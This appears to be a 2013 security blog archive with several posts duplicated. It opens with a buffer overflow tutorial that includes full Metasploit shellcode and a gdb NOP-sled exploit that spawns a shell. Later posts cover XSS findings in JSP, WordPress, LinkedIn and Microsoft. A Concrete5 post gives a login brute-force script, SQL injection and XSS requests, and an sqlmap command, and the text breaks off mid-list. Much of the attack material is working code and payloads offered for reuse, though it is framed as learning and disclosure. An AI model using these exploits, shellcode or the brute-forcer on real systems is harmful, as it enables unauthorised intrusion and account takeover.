Document was created to consolidate knowledge about buffer overflows.
1. Why exploit is not working on the modern system(s)?
Because of development of new programs, systems and protections attackers
are working on new techniques to bypass those protections.
2. What to do to check what security settings we have at our system?
In the machine like mine (Debian 7, with `uname`:
Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686 GNU/Linux)
we can do it in a few ways, for example:
a) ldd - print shared library dependencies
Typing:
$ ldd <ourprog>
few times, we can check if addresses in memory have changed. It will help
us to specify if in our system we have enabled so called ASLR(1).
b) we can also check if ASLR is enabled by default by reading the value
from 'randomize_va_space' file:
$ cat /proc/sys/kernel/randomize_va_space
Any other value than 0 tells us that addresses will be changed.
In case of learning process it's good to change this (default) value
to zero. We can do it by:
# echo "0" > /proc/sys/kernel/randomize_va_space
c) Tobias Klein(2) wrote a nice tool to check what security setting
was added to our binary. This tool you can find at his page(2).
3. Where can we start?
We can start everywhere where we will find a computer. ;)
Better question is: what we should know to start understanding,
not only rewriting examples from books and articles.
So, a short list:
-- programming in C (you not need to be 'ace', you need only few
chapters from any book about C where you will find information about:
arrays, pointers, receiving and displaying characters and probably few
things about memory management).
-- programming in Python - because many tools (for example fuzzers) can
be created really fast.(3)
-- ASM - the magic and the scare, super difficult and super easy at the
same time. In my case the best idea to learn this, was a paper and pen (4)
and writting names of registers (for example Intel's), what they means and
for what we can use them. Nice idea to memorization.
Next step is getting used to all super-magic shortcuts like add, movl, call
and so on. (You can write it down too. The more you practice, the better.)
-- if it's still not enough for you, good start should be also:
$ man gcc
(try here (5)) and check what (changes and) options are available during
the compilation (what will be usefull to understand what protections
you can disable at the compilation stage.)
4. Example
We will need some example vulnerable to attack.
At my blog I decide to write about few cases how to exploit RCE
in webapps (6) so in a similar way we will try to find a vulnerable
example in C language.
https://github.com/search?q=extension%3AC+strcpy%28argv[1]%29&ref=cmdform
Searching in this way we will find few examples of 'lessons' described
by someone else. We will use this examples. First answer for our search
query is a program called 'vulnerable.c':
---<code>---
void main(int argc, char *argv[])
{
char buffer[512];
if (argc > 1)
strcpy(buffer,argv[1]);
}
---<code>---
Making sure, that "randomize_va_space" file has value '0', we will compile(7)
our vulnerable program:
* -ggdb - "Produce debugging information for use by GDB"
* -g - "Produce debugging information in the operating system's native format"
* -fno-stack-protector - disables the protection
k@debian:~/src/bugz$ gcc vulnerable.c -o vulnerable -ggdb -g -fno-stack-protector
We will fill the buffer of our program, to overflow it.
$ gdb -q ./vulnerable
(gdb) r `perl -e 'print "A"x524,"B"x4'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/k/src/bugz/vulnerable `perl -e 'print "A"x524,"B"x4'`
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)
Ok. Program crashed.
No we will get a shellcode (from Metasploit from BackTrack5(8)).
To get on, we will use 'msfpayload':
root@bt:/pentest/exploits/framework3# msfpayload linux/x86/exec CMD=dash R |
msfencode -a x86 -e x86/alpha_mixed -b "\x00\x0a\x0d" -t c
[*] x86/alpha_mixed succeeded with size 142 (iteration=1)
unsigned char buf[] =
"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x5a\x56\x6b\x56\x38\x5a\x39\x43\x62\x45\x36\x43\x58\x56"
"\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51\x63\x50\x68"
"\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b"
"\x53\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34"
"\x51\x71\x50\x73\x50\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58"
"\x61\x58\x4d\x4f\x70\x41\x41";
Using this command we will have a shellcode ready to use as our buffer value.
To get this working we must remember that we will need to substract from
our 'overflow'-value (524*"A"), length of our shellcode (142 bytes in
this case).
To exploit this vulnerability we will need this kind of situation:
[ A*382 ] + [ shellcode ] + [ B*4 ]
to set EIP (instruction pointer, holds the program counter, current instruction
address) to our "BBBB" string.
So now in 'gdb' we will use this string:
(gdb) r `perl -e 'print "A"x382,"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49
\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a
\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42
\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x43\x5a\x56\x6b\x56\x38\x5a\x39
\x43\x62\x45\x36\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51
\x63\x50\x68\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b\x53
\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34\x51\x71\x50\x73\x50
\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58\x61\x58\x4d\x4f\x70\x41\x41","B"x4'`
Our output should look like this:
Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) i r eip ebp esp
eip 0x42424242 0x42424242
ebp 0x4141704f 0x4141704f
esp 0xbffff540 0xbffff540
Ok. Now we must localize the beginning of our shellcode in memory:
(gdb) x/600wx $esp
(...)
0xbffff880: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff890: 0x41414141 0x41414141 0x41414141 0xc6d9e189
0xbffff8a0: 0x58f471d9 0x49495950 0x49494949 0x49494949
0xbffff8b0: 0x43434343 0x51374343 0x58416a5a 0x30413050
(...)
Ok. Let's check if the answer from gdb is the real one, which we want to
call by our overflow:
(gdb) x/s 0xbffff890
0xbffff890: 'A' <repeats 12 times>"\211, \341\331\306\331q\
364XPYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJICZVkV8Z9
CbE6CXVMRCLIZGCXToQcPhEPRHVOPbE9PnMYKSCbIxC5C0GpGpE4QqPsPhGpCgV3
LIXaXMOpAABBBB"
Almost good.
Instead of letter "A" we will use NOP ("no operation") instruction. It
will let us 'slide' to our address (where we want to return). Instead
of mentioned "B" value, let's use the value we've found before:
(gdb) r `perl -e 'print "\x90"x382,"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50
\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37
\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32
\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x43\x5a\x56
\x6b\x56\x38\x5a\x39\x43\x62\x45\x36\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a
\x47\x43\x58\x54\x6f\x51\x63\x50\x68\x45\x50\x52\x48\x56\x4f\x50\x62\x45
\x39\x50\x6e\x4d\x59\x4b\x53\x43\x62\x49\x78\x43\x35\x43\x30\x47\x70\x47
\x70\x45\x34\x51\x71\x50\x73\x50\x68\x47\x70\x43\x67\x56\x33\x4c\x49\x58
\x61\x58\x4d\x4f\x70\x41\x41","\x90\xf8\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/k/src/bugz/vulnerable `perl -e 'print "\x90"x382,
"\x89\xe1\xd9\xc6\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49
\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30
\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50
\x38\x41\x42\x75\x4a\x49\x43\x5a\x56\x6b\x56\x38\x5a\x39\x43\x62\x45\x36
\x43\x58\x56\x4d\x52\x43\x4c\x49\x5a\x47\x43\x58\x54\x6f\x51\x63\x50\x68
\x45\x50\x52\x48\x56\x4f\x50\x62\x45\x39\x50\x6e\x4d\x59\x4b\x53\x43\x62
\x49\x78\x43\x35\x43\x30\x47\x70\x47\x70\x45\x34\x51\x71\x50\x73\x50\x68
\x47\x70\x43\x67\x56\x33\x4c\x49\x58\x61\x58\x4d\x4f\x70\x41\x41",
"\x90\xf8\xff\xbf"'`
process 4336 is executing new program: /bin/dash
$ uname -a
Linux debian 3.2.0-4-686-pae #1 SMP Debian 3.2.51-1 i686 GNU/Linux
$
And that's all. Now we have exploited a buffer overflow vulnerability.
Thanks!
1) ASLR
http://en.wikipedia.org/wiki/Address_space_layout_randomization
2) Tobias Klein -
http://www.trapkit.de
3) Python
https://wiki.python.org/moin/BeginnersGuide
http://en.wikibooks.org/wiki/Python_Programming
4) ASM
http://en.wikibooks.org/wiki/X86_Assembly
5) GCC
http://gcc.gnu.org/releases.html
6) Finding vulnerabilities at github.com
http://hauntit.blogspot.com/2013/06/en-rce-another-lesson.html
7) GCC Debugging options
http://gcc.gnu.org/onlinedocs/gcc-4.1.2/gcc/Debugging-Options.html
8) Metasploit
http://www.metasploit.com
Tuesday, 10 December 2013
Tuesday, 19 November 2013
[EN] Microsoft's bug bounty - updated
Yesterday was a day full of surprises.
Another nice email, this time from MS ;)
* Update @ 05.12.2013 *
http://technet.microsoft.com/en-us/security/cc308589.aspx
Thanks! ;)
Remember about responsible disclosure!
Cheers,
o/
Another nice email, this time from MS ;)
* Update @ 05.12.2013 *
http://technet.microsoft.com/en-us/security/cc308589.aspx
Thanks! ;)
Remember about responsible disclosure!
Cheers,
o/
[EN] LinkedIn Bug Bounty
It was a real pleasure to work with LinkedIn Security Team!
Thanks guys. ;)
 |
| LinkedIn bugbounty |
Thanks guys. ;)
Tuesday, 29 October 2013
[EN] JSP Code Review - part 1
Durning pentesting of webapps in various companies, often happens that
few pages are written in JSP.
I described here few different cases of testing webapps - by white box and/or black box
testing - so today I decide, why not do it again for JSP-based pages? ;)
For our purpose, a great example we can find at one of pages with tutorials
in section called 'HTTP Header Request Example'. Below I will show you
how we can check if this or that (or part of ;)) page is vulnerable to attacks.
(In case you don't know how to prepare your virtual environment for testing
JSP-based pages, check this site. Here you will find nearly step-by-step list
to install Tomcat with Java at your linux-box. If you will have any troubles
leave me an email or comment below.)
Ok. Let's get back to our JSP tutorial.
Example code will show headers after request to our 'test page'.
---<code>---
<%@ page import="java.io.*,java.util.*" %>
<html>
<head>
<title>HTTP Header Request Example</title>
</head>
<body>
<center>
<h2>HTTP Header Request Example</h2>
<table width="100%" border="1" align="center">
<tr bgcolor="#949494">
<th>Header Name</th><th>Header Value(s)</th>
</tr>
<%
Enumeration headerNames = request.getHeaderNames();
while(headerNames.hasMoreElements()) {
String paramName = (String)headerNames.nextElement();
out.print("<tr><td>" + paramName + "</td>\n");
String paramValue = request.getHeader(paramName);
out.println("<td> " + paramValue + "</td></tr>\n");
}
%>
</table>
</center>
</body>
</html>
---<code>---
Ok. Let's save this code as 'headers.jsp'.
It's not the problem to test this site by using Burp like it was described
in few mini-arts here but in this case we will do a little 'code review'. ;)
Few short examples was also described here or here. So here we will use
similar trick. In case we know that if user's input is not (or properly) sanitized
then it's possible to inject code in web.
So now we will search for 'something' that will print out 'text' (string) added
by user. In our JSP, it will befunction out.print. Let's find out if we can
grab this string in our source code:
# cat -n header.jsp | grep out.print
17 out.print("<tr><td>" + paramName + "</td>\n");
19 out.println("<td> " + paramValue + "</td></tr>\n");
#
Yes, we can. ;)
We can see 2 lines, both with 'some parameter/value names'.
Let's find out what are those:
(...)
String paramName = (String)headerNames.nextElement();
(...)
It seems to be some 'string', let's check the other 'parameter':
# grep paramValue header.jsp
String paramValue = request.getHeader(paramName);
out.println("<td> " + paramValue + "</td></tr>\n");
#
Great. So now we can see that 'paramName' is from request, and it gets
some header value(s) (getHeader() function). And, because its not filtered
in any way before printing out, we can try to inject here some code.
Let's check if we can change one of presented headers, for example,
lets change an user Agent.
To do that we can use DataTamper or mentioned Burp Proxy (but honestly
in my opinion for this kind of 'simple checking' - DataTamper will be fine.
Let's catch request to server (our 'header page' in JSP) and next we will
change value from userAgent to our favourite 'XSS payload':
Good luck with code review!
If you have any questions - as always - leave me an email. ;)
Cheers
o/
few pages are written in JSP.
I described here few different cases of testing webapps - by white box and/or black box
testing - so today I decide, why not do it again for JSP-based pages? ;)
For our purpose, a great example we can find at one of pages with tutorials
in section called 'HTTP Header Request Example'. Below I will show you
how we can check if this or that (or part of ;)) page is vulnerable to attacks.
(In case you don't know how to prepare your virtual environment for testing
JSP-based pages, check this site. Here you will find nearly step-by-step list
to install Tomcat with Java at your linux-box. If you will have any troubles
leave me an email or comment below.)
Ok. Let's get back to our JSP tutorial.
Example code will show headers after request to our 'test page'.
---<code>---
<%@ page import="java.io.*,java.util.*" %>
<html>
<head>
<title>HTTP Header Request Example</title>
</head>
<body>
<center>
<h2>HTTP Header Request Example</h2>
<table width="100%" border="1" align="center">
<tr bgcolor="#949494">
<th>Header Name</th><th>Header Value(s)</th>
</tr>
<%
Enumeration headerNames = request.getHeaderNames();
while(headerNames.hasMoreElements()) {
String paramName = (String)headerNames.nextElement();
out.print("<tr><td>" + paramName + "</td>\n");
String paramValue = request.getHeader(paramName);
out.println("<td> " + paramValue + "</td></tr>\n");
}
%>
</table>
</center>
</body>
</html>
---<code>---
Ok. Let's save this code as 'headers.jsp'.
It's not the problem to test this site by using Burp like it was described
in few mini-arts here but in this case we will do a little 'code review'. ;)
Few short examples was also described here or here. So here we will use
similar trick. In case we know that if user's input is not (or properly) sanitized
then it's possible to inject code in web.
So now we will search for 'something' that will print out 'text' (string) added
by user. In our JSP, it will befunction out.print. Let's find out if we can
grab this string in our source code:
# cat -n header.jsp | grep out.print
17 out.print("<tr><td>" + paramName + "</td>\n");
19 out.println("<td> " + paramValue + "</td></tr>\n");
#
Yes, we can. ;)
We can see 2 lines, both with 'some parameter/value names'.
Let's find out what are those:
(...)
String paramName = (String)headerNames.nextElement();
(...)
It seems to be some 'string', let's check the other 'parameter':
# grep paramValue header.jsp
String paramValue = request.getHeader(paramName);
out.println("<td> " + paramValue + "</td></tr>\n");
#
Great. So now we can see that 'paramName' is from request, and it gets
some header value(s) (getHeader() function). And, because its not filtered
in any way before printing out, we can try to inject here some code.
Let's check if we can change one of presented headers, for example,
lets change an user Agent.
To do that we can use DataTamper or mentioned Burp Proxy (but honestly
in my opinion for this kind of 'simple checking' - DataTamper will be fine.
Let's catch request to server (our 'header page' in JSP) and next we will
change value from userAgent to our favourite 'XSS payload':
 |
| Tampered header |
As a response from this not-filtered input, we can see nice and old XSS alert box ;)
 | |
| XSS in JSP webapp |
Good luck with code review!
If you have any questions - as always - leave me an email. ;)
Cheers
o/
Wednesday, 9 October 2013
[EN] Testing format strings bugs
Few weeks ago I wrote a short post about where you can find examples
to learn RCE vulnerabilities and how to exploit them.
Today I would like to present you similar story, this time for format string attacks.
Few examples of vulnerable codes you will find here. ;)
If you have any questions feel free to ask, but once again:
I will help you only with legal ideas, so please do not send me an emails
that you want steal someone's database ;) Thanks.
Enjoy!
o/
to learn RCE vulnerabilities and how to exploit them.
Today I would like to present you similar story, this time for format string attacks.
Few examples of vulnerable codes you will find here. ;)
If you have any questions feel free to ask, but once again:
I will help you only with legal ideas, so please do not send me an emails
that you want steal someone's database ;) Thanks.
Enjoy!
o/
[EN] Wordpress 3.6.1 XSS
"Houston we've got a problem..." ;)
... in latest (3.6.1) Wordpress :
Same story as before but seems to be not patched anyway:
Enjoy, because 'it can not be used' - right? ;)
* Update @ 17/10/2013 *
Check file 'options-discussion.php' in /wp-admin/ directory, for lines 187-202.
You will find there:
---<code>---
187 <?php
188 $ratings = array(
189 /* translators: Content suitability rating: http://bit.ly/89QxZA */
190 'G' => __('G — Suitable for all audiences'),
191 /* translators: Content suitability rating: http://bit.ly/89QxZA */
192 'PG' => __('PG — Possibly offensive, usually for audiences 13 and above'),
193 /* translators: Content suitability rating: http://bit.ly/89QxZA */
194 'R' => __('R — Intended for adult audiences above 17'),
195 /* translators: Content suitability rating: http://bit.ly/89QxZA */
196 'X' => __('X — Even more mature than above')
197 );
198 foreach ($ratings as $key => $rating) :
199 $selected = (get_option('avatar_rating') == $key) ? 'checked="checked"' : '';
200 echo "\n\t<label><input type='radio' name='avatar_rating' value='" . esc_attr($key) . "' $selected/> $rating</label><br />";
201 endforeach;
202 ?>
---<code>---
so because there is no any checking if 'rating' is valid or not, we can put in 'avatar_rating'
parameter any JavaScript/HTML code we want. In this case reflected XSS is possible.
To patch this bug, we need to edit wp-includes/pluggable.php file and change line 1662 like below:
Simple change this line and add Wordpress's functions 'esc_html'.
Now it should be ok. ;)
... in latest (3.6.1) Wordpress :
Same story as before but seems to be not patched anyway:
* Update @ 17/10/2013 *
Check file 'options-discussion.php' in /wp-admin/ directory, for lines 187-202.
You will find there:
---<code>---
187 <?php
188 $ratings = array(
189 /* translators: Content suitability rating: http://bit.ly/89QxZA */
190 'G' => __('G — Suitable for all audiences'),
191 /* translators: Content suitability rating: http://bit.ly/89QxZA */
192 'PG' => __('PG — Possibly offensive, usually for audiences 13 and above'),
193 /* translators: Content suitability rating: http://bit.ly/89QxZA */
194 'R' => __('R — Intended for adult audiences above 17'),
195 /* translators: Content suitability rating: http://bit.ly/89QxZA */
196 'X' => __('X — Even more mature than above')
197 );
198 foreach ($ratings as $key => $rating) :
199 $selected = (get_option('avatar_rating') == $key) ? 'checked="checked"' : '';
200 echo "\n\t<label><input type='radio' name='avatar_rating' value='" . esc_attr($key) . "' $selected/> $rating</label><br />";
201 endforeach;
202 ?>
---<code>---
so because there is no any checking if 'rating' is valid or not, we can put in 'avatar_rating'
parameter any JavaScript/HTML code we want. In this case reflected XSS is possible.
To patch this bug, we need to edit wp-includes/pluggable.php file and change line 1662 like below:
 | |
| Changed pluggable.php file |
Simple change this line and add Wordpress's functions 'esc_html'.
Now it should be ok. ;)
Friday, 4 October 2013
[EN] osCommerce 2.3.3.4 Exploited
Hi ;)
Durning few projects sometimes I can find that customers are using osCommerce
at their servers.
I prepare a small (poc) tool to a little bit automate a process of password cracking
and exploiting RCE available in admin panel (again ;) ).
Like I said to next week, this won't be public, sorry.
Anyway if you think that you will need it before (to test your sites or
your customers) then feel free to let me know privately, via email as always.
Have a nice day
o/
Durning few projects sometimes I can find that customers are using osCommerce
at their servers.
I prepare a small (poc) tool to a little bit automate a process of password cracking
and exploiting RCE available in admin panel (again ;) ).
Like I said to next week, this won't be public, sorry.
Anyway if you think that you will need it before (to test your sites or
your customers) then feel free to let me know privately, via email as always.
Have a nice day
o/
Monday, 30 September 2013
[EN] XSS at Microsoft page
Hi,
durning bugbounty tests I decide to try at Microsoft's page.
After a while, I found one bug.
Of course there was a nice contact about the whole case, but
after asking about any response - no contact to this day. :)
So... public ;)
Similar story to one, described few minutes ago about linkedin.com.
* Update @ 11/10.2013 *
Finally I've got an answer about this case, and it should be presented at their page.
In case of any news I will publish here the details.
Enjoy and remember to do only legal things ;)
Cheers
o/
durning bugbounty tests I decide to try at Microsoft's page.
After a while, I found one bug.
Of course there was a nice contact about the whole case, but
after asking about any response - no contact to this day. :)
So... public ;)
Similar story to one, described few minutes ago about linkedin.com.
* Update @ 11/10.2013 *
Finally I've got an answer about this case, and it should be presented at their page.
In case of any news I will publish here the details.
Enjoy and remember to do only legal things ;)
Cheers
o/
[EN] Another XSS at LinkedIn.com
Hi,
durning few tests in few different bugbounty programs,
at 19.09 this year I found another persistent XSS in our nice job portal
www.linkedin.com
Durning mails with IT support I think it is patched now, but
if you wanna try - here you have a short list of steps to reproduce:
1. Log-in to your account
2. Go to contact lists, to 'imported contacts'
3. Edit one contact
4. In a new windows, in edited person, surename is vulnerable
to persistent XSS.
Below screen from sample 'attack':
* Update @ 01.10.2013 *
'Seems to patchet at production.' ;)
* Update @ 04.10.2013 *
LinkedIn Team once again surprised me about their answer. :)
This is realy good Team!
Good job guys!
Enjoy and remember, do only legal things ;)
Cheers
o/
durning few tests in few different bugbounty programs,
at 19.09 this year I found another persistent XSS in our nice job portal
www.linkedin.com
Durning mails with IT support I think it is patched now, but
if you wanna try - here you have a short list of steps to reproduce:
1. Log-in to your account
2. Go to contact lists, to 'imported contacts'
3. Edit one contact
4. In a new windows, in edited person, surename is vulnerable
to persistent XSS.
Below screen from sample 'attack':
* Update @ 01.10.2013 *
'Seems to patchet at production.' ;)
* Update @ 04.10.2013 *
LinkedIn Team once again surprised me about their answer. :)
This is realy good Team!
Good job guys!
Enjoy and remember, do only legal things ;)
Cheers
o/
Wednesday, 25 September 2013
[EN] IPBoard 3.x Updates
Yesterday I saw a new post at IPBoard Community Forum about few
new vulnerabilities and patches.
If you're using mentioned version(s) I would recommend you to update it as soon as you can.
"How to do it" was described at forums page.
Big thanks to guys from IPB Support for a fast response and great job!
Keep going! ;)
new vulnerabilities and patches.
If you're using mentioned version(s) I would recommend you to update it as soon as you can.
"How to do it" was described at forums page.
Big thanks to guys from IPB Support for a fast response and great job!
Keep going! ;)
Friday, 16 August 2013
[EN] Friday... ;)
root@bt:~/src/ntop/ntop-1.1$ ./entop
SIOCGIFADDR error: 1Û¸·ªªª%·UUUSSÍ1Û¸ªªª%UUUSSÍë^1ÀFF
V
° N
ó
Í1ÛØ@ÍèÜÿÿÿ/bin/shàìÿ¿àìÿ¿/
errno=19
ntop v.1.1 MT [i686-pc-linux-gnu] listening on ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
Host Act -Rcvd- Sent TCP UDP ICMP sh-4.1# uid=0(root) gid=0(root) groups=0(root)
sh-4.1#
(;
Monday, 12 August 2013
[EN] Concrete5 6.1.2 Multiple Bugs
From SQL injection via multiple XSS to information gathering...
Enjoy:
Starting from description of bugs available for admin user logged-in I should mention
that there is no anti-bruteforce mechanizm, so if admins password is 'simple',
we can crack it, like it was described below:
Code to test it:
---< code >---
root@bt:/pentest/web/scanners/sqlmap# cat /root/src/concrete5612bf.py
#!/usr/bin/env python
# code after a little update : 14.08 ;)
#
import requests
import sys
username = 'admin'
path = '/index.php/login/do_login/'
print '\n_________________________________________________'
print '>>>\t Concrete5 6.1.2 CMS login-tester.\t<<<\n'
print 'If login:pass match, you can use sql injection attack\nfor admin user part of webapp.\n\n'
pwdfile = open('passwords.txt','r')
read_pass = pwdfile.readlines()
for test_pass in read_pass:
url = sys.argv[1]+path
data = {
'uName':username,
'uPassword':test_pass,
'rcID':'',
'submit':'Sign+In+%3E',
}
get_cookies = requests.post(url)
conn = requests.post(url, data=data, cookies=get_cookies.cookies)
print '[ > ] Status code for this request: ', conn.status_code
lines = conn.content
if 'Currently' in lines:
print '[+] Logged in as: [', username, '] with password: [', test_pass,']'
---< code >---
So if we will have an admin password, we can start from...
1. SQL injection
---< request >---
POST /concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/ HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 2223
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-publish-draft"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="cName"
qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cHandle"
qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDescription"
qweqweqweqwe
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_dt"
8/12/2013
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_h"
11
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_m"
14
-----------------------------289491801917736
Content-Disposition: form-data; name="cDatePublic_a"
AM
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_57_170][fID]"
'%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_58_170][fID]"
8
-----------------------------289491801917736
Content-Disposition: form-data; name="fType"
1
-----------------------------289491801917736
Content-Disposition: form-data; name="_bf[BLOCK_59_170][content]"
<p>This is my first blog post.</p>
-----------------------------289491801917736
Content-Disposition: form-data; name="newAttrValueRows14"
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm-submit-publish"
Publish Changes
-----------------------------289491801917736
Content-Disposition: form-data; name="entryID"
170
-----------------------------289491801917736
Content-Disposition: form-data; name="autosave"
0
-----------------------------289491801917736
Content-Disposition: form-data; name="ccm_token"
1376298893:60a85801b0c4f4b73d887a387b4a0aa2
-----------------------------289491801917736--
---< request >---
Because "_bf[BLOCK_" parameters are not properly filtered, we can use it to generate sql error, like this:
---< response >---
<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near
''%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,fOnstateID=0,maxWidth=0,' at line 1] in
EXECUTE("UPDATE btContentImage SET fID='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e,
fOnstateID=0,maxWidth=0,maxHeight=0,externalLink='',internalLinkCID=0,forceImageToMatchDimensions=NULL,altText=NULL WHERE bID=57")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2/" class="btn">< Back to Home</a></p>
</div>
---< response >---
To reproduce this vulnerability you can use sqlmap tool:
root@bt:/pentest/web/scanners/sqlmap# ./sqlmap.py -u "http://10.149.14.52/concrete5/concrete5.6.1.2//index.php/dashboard/composer/write/save/"
--data "ccm-publish-draft=1&cName=qweqweqweqwe&cHandle=qweqweqweqwe&cDescription=qweqweqweqwe&cDatePublic_dt=
8/12/2013&cDatePublic_h=11&cDatePublic_m=14&cDatePublic_a=AM&fType=1&_bf[BLOCK_57_170][fID]=4&fType=1&_bf[BLOCK_58_170][fID]=8
&fType=1&_bf[BLOCK_59_170][content]=<p>This is my first blog post.</p>&newAttrValueRows14=&ccm-submit-publish=Publish Changes&entryID=170
&autosave=0&ccm_token=1376298893:60a85801b0c4f4b73d887a387b4a0aa2" --cookie "CONCRETE5=obo3k5oa1b23mdfkmjai0ka8n3;
CONCRETE5=p5kvcagr4fv6n9p75ojqdbst25; CONCRETE5_INSTALL_TEST=1"
2. DOM-based XSS
---< request >---
POST /concrete5/concrete5.6.1.2/index.php/tools/required/files/importers/single HTTP/1.1
Host: 10.149.14.52
(...)
Content-Length: 1119
-----------------------------55721791519552
Content-Disposition: form-data; name="Filedata"; filename="2ASK.txt"
Content-Type: text/plain
sialala cze;]
-----------------------------55721791519552
Content-Disposition: form-data; name="searchInstance"
');</script><script>alert(2);</script>//
-----------------------------55721791519552
Content-Disposition: form-data; name="ccm_token"
1376287516:62ba4fa101db6bfb5a15c832e2839c1b
-----------------------------55721791519552
Content-Disposition: form-data; name="ocID"
-----------------------------55721791519552--
---< request >---
---< response >---
window.parent.ccm_filesUploadedDialog('');</script><script>alert(2);</script>//');
---< response >---
3. sql error to check
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/pages/search_results?searchInstance=page1376287517&submit_search=1&ccm_order_dir=&ccm_order_by=&cvName=asd&ctID=&numResults=11111111111111111111111&ccm-search-pages=Search&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
resp:
<h1>An unexpected error occurred.</h1>
<div class="ccm-error block-message alert-message error">mysql error: [1064: You have an error in your SQL syntax; check
the manual that corresponds to your MySQL server version for the right syntax to use near '11111111111111111111111' at line 1]
in EXECUTE("select p1.cID, pt.ctHandle from Pages p1 left join PagePaths on (PagePaths.cID = p1.cID and PagePaths.ppIsCanonical = 1) left
join PageSearchIndex psi on (psi.cID = p1.cID) inner join CollectionVersions cv on (cv.cID = p1.cID and cvID = (select max(cvID) from CollectionVersions
where cID = cv.cID)) left join PageTypes pt on (pt.ctID = cv.ctID) inner join Collections c on (c.cID = p1.cID) left join CollectionSearchIndexAttributes on
(CollectionSearchIndexAttributes.cID = p1.cID) where 1=1 and cvName like '%asd%' and (p1.cPointerID < 1 or p1.cPointerID is null) and p1.cIsTemplate = '0'
and p1.cIsActive = '1' and (p1.cIsSystemPage = 0) limit 0,11111111111111111111111 ")
</div><p><a href="http://10.149.14.52/concrete5/concrete5.6.1.2" class="btn">< Back to Home</a></p>
</div>
4. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search="><script>alert(22)</script>XXX&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir=&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
5. xss
---< request >---
GET /concrete5/concrete5.6.1.2/index.php/tools/required/files/search_results?submit_search=1&fType=&fExtension=&searchType=DASHBOARD&ccm_order_dir="><script>alert(1)</script>&ccm_order_by=&fileSelector=&searchInstance=file1376287516&fKeywords=&numResults=10&searchField=&selectedSearchField%5B%5D= HTTP/1.1
Host: 10.149.14.52
(...)
Connection: close
---< request >---
6. xss
---< request >---
